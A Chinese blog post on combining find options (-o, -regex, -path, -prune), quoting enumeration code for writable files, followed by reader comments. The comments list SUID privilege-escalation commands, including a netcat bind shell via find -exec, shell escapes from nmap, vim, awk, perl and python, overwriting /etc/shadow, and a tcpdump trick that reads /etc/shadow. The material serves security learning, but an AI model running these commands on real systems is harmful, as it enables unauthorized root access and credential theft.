Linux下用find命令一次查找多种类型的文件

本文最后更新于2015年11月7日,已超过 1 年没有更新,如果文章内容失效,还请反馈给我,谢谢!

=Start=

=find命令的-o/-regex选项=

标题虽然比较拗口,但功能比较实用,之前有用过,但是没有总结过,因此,在这里用一篇文章记录一下。

#需求:查找当前目录下所有的JPG和PNG类型的图片文件

#方法一
find -maxdepth 2 -type f \( -iname \*.jpg -o -iname \*.png \)  #-maxdepth选项需要放在-type选项之前
find -maxdepth 2 -type f -mtime -7 \( '*.jpg' -o -name '*.png' \)

#方法二
find -maxdepth 2 -iregex '.*\.\(jpg\|png\)$'

#方法三
find -maxdepth 2 -regextype posix-extended -regex '.*\.(jpg|png)$'
参考链接:
=find命令的-path/-prune选项=
#looks for files we can write to that don't belong to us(注意其中-path选项之后的写法,带有通配符)
if [ "$thorough" = "1" ]; then
    grfilesall=`find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null`
    if [ "$grfilesall" ]; then
        echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" |tee -a $report 2>/dev/null
        echo -e "\n" |tee -a $report 2>/dev/null
    else
        :
    fi
fi

#list all world-writable files excluding /proc(『非』的另一种写法 -not)
if [ "$thorough" = "1" ]; then
wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null`
    if [ "$wwfiles" ]; then
        echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" |tee -a $report 2>/dev/null
        echo -e "\n" |tee -a $report 2>/dev/null
    else
        :
    fi
  else
    :
fi
-path pattern
    File name matches shell pattern pattern. The metacharacters do not treat `/' or `.' specially; so, for example,
            find . -path "./sr*sc"
    will print an entry for a directory called `./src/misc' (if one exists). To ignore a whole directory tree, use -prune rather than checking every file in the tree. For example, to skip the directory `src/emacs' and all files and directories under it, and print the names of the other files found, do something like this:
            find . -path ./src/emacs -prune -o -print
    Note that the pattern match test applies to the whole file name, starting from one of the start points named on the command line.  It would only make sense  to  use  an  absolute path name here if the relevant start point is also an absolute path.  This means that this command will never match any thing:
            find bar -path /foo/bar/myfile -print
    The predicate -path is also supported by HP-UX find and will be in a forthcoming version of the POSIX standard.

# -path 选项后面接的是一个"pattern",即模式匹配串,它的作用只是在最后判定是否打印(但已经进行了搜索操作);如果一开始就不想要搜索某个目录,请使用 -prune 选项,直接跳过搜索该目录,速度会更快,效率更高

-prune
    True; if the file is a directory, do not descend into it. If -depth is given, false; no effect.  Because -delete implies -depth, you cannot usefully use -prune and -delete together.

=EOF=

声明: 除非注明,ixyzero.com文章均为原创,转载请以链接形式标明本文地址,谢谢!
https://ixyzero.com/blog/archives/2510.html

8 thoughts on “Linux下用find命令一次查找多种类型的文件”

  1. -prune:如果符合条件的是一个目录,则不进入目录进行查找。例子:
    `
    [root@localhost ~]# mkdir /etc/passs
    [root@localhost ~]# touch /etc/passs/passwd
    [root@localhost ~]# find /etc/ -name “pass*” -prune
    /etc/passs
    /etc/default/passwd
    /etc/pam.d/passwd
    /etc/passwd-
    /etc/passwd
    [root@localhost ~]# find /etc/ -name “pass*”
    /etc/passs
    /etc/passs/passwd
    /etc/default/passwd
    /etc/pam.d/passwd
    /etc/passwd-
    /etc/passwd
    `
    参考:
    http://liwei.life/2016/07/11/find%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/

  2. suid backdoor
    `
    # find / -perm -4000 -type f -print0 2>/dev/null | xargs -0 ls -lt
    # find / -perm -4000 -user root -type f -print0 2>/dev/null | xargs -0 ls -lt
    # 对于我们的模糊搜索要求来说,主要用 ‘-perm -mode’ 的形式,而不是 ‘-perm +mode’
    `
    https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/
    http://en.wikipedia.org/wiki/Setuid
    http://joshrendek.com/2013/02/why-setuid-is-bad-and-what-you-can-do/
    https://gist.githubusercontent.com/dergachev/7916152/raw/f2a89578d2dbb89f9726153117d10b6b5a49caec/setuid-root-backdoor.md

    Linux命令find -perm使用方法
    http://blog.csdn.net/zbszhangbosen/article/details/7528680
    http://bbs.chinaunix.net/thread-442733-1-1.html

    1. 对SUID可提权Root Shell的探究
      http://www.freebuf.com/articles/system/149118.html
      https://pentestlab.blog/2017/09/25/suid-executables/
      `
      SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

      已知的可以用来提权的Linux可执行文件有:
      Ø Nmap
      Ø Vim
      Ø find
      Ø Bash
      Ø More
      Ø Less
      Ø Nano
      Ø cp
      `

  3. Fuzzy finder(fzf+vim) 使用全指南
    https://keelii.com/2018/08/12/fuzzy-finder-full-guide/
    https://github.com/junegunn/fzf
    `
    Fuzzy finder 是一款使用 GO 语言编写的交互式的 Unix 命令行工具。可以用来查找任何 列表 内容,文件、Git 分支、进程等。所有的命令行工具可以生成列表输出的都可以再通过管道 pipe 到 fzf 上进行搜索和查找。

    优点:
    Go 语言编写,编译完生成可执行文件没有任何依赖
    搜索/查找速度飞快
    功能全面/可视化界面体验很棒
    周边插件丰富 (vim, tmux, fuzzy auto-completion)
    `

    A simple, fast and user-friendly alternative to ‘find’
    https://github.com/sharkdp/fd

  4. Tiny file search utility (bash)
    https://github.com/rauchg/spot
    `
    # 用来学习 bash 编程是个不错的例子

    Short & written in Bash: you can edit it easily to suit your liking.
    Fast. Just find + grep + awk.
    Searches most things by default instead of some known predefined extensions.
    Ignores .git, .hg, .svn, devices and binary files.
    `

  5. Linux下利用SUID提权
    https://mp.weixin.qq.com/s/UfPLm53gAlc_z28kH4OYHQ
    `
    nmap –interactive
    nmap> !sh
    sh-3.2# whoami
    root

    touch pentestlab
    find pentestlab -exec whoami \;
    find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

    vim.tiny /etc/shadow
    vim.tiny
    # Press ESC key
    :set shell=/bin/sh
    :shell

    bash -p
    bash-3.2# id
    uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

    less /etc/passwd

    more /home/pelle/myfile

    使用 cp 覆盖 /etc/shadow

    使用 mv 覆盖 /etc/shadow 或者/etc/sudoers

    awk ‘BEGIN {system(“/bin/bash”)}’

    man passwd

    # perl
    exec “/bin/bash”;

    # python
    import os
    os.system(“/bin/bash”)

    # tcpdump
    echo $’id\ncat /etc/shadow’ > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    `

发表评论

电子邮件地址不会被公开。 必填项已用*标注